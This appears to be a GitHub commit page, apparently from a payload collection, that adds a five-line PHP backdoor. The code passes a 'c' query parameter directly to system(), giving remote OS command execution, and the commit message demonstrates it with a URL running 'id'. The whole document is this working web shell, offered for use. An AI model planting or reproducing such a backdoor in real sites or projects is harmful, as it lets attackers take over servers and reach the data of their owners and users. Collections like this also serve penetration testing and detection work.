Tiny php remote os commanding backdoor

Example usage:

http://host/?c=id
This commit is contained in:
Adam Muntner 2016-10-16 15:47:43 -04:00 committed by GitHub
parent 89c59e7d74
commit 837c737b28

View file

@ -0,0 +1,5 @@
<?php
if($_GET['c']) {
system($_GET['c']);
}
?>